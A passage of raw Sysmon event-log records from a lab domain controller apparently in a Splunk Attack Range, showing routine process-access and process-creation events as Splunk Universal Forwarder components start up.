13:41:17.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-49FD-6000-8805-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.518{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FD-6000-8805-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:17.519{08A6967A-49FD-6000-8805-000000009A01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.956{08A6967A-49FE-6000-8A05-000000009A01}44686740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FE-6000-8A05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-49FE-6000-8A05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.800{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FE-6000-8A05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.801{08A6967A-49FE-6000-8A05-000000009A01}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.346{08A6967A-49FE-6000-8905-000000009A01}35283956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FE-6000-8905-000000009A01}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49FE-6000-8905-000000009A01}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.190{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FE-6000-8905-000000009A01}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:18.191{08A6967A-49FE-6000-8905-000000009A01}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49FF-6000-8B05-000000009A01}5160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-49FF-6000-8B05-000000009A01}5160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:41:19.940{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49FF-6000-8B05-000000009A01}5160C:\Program 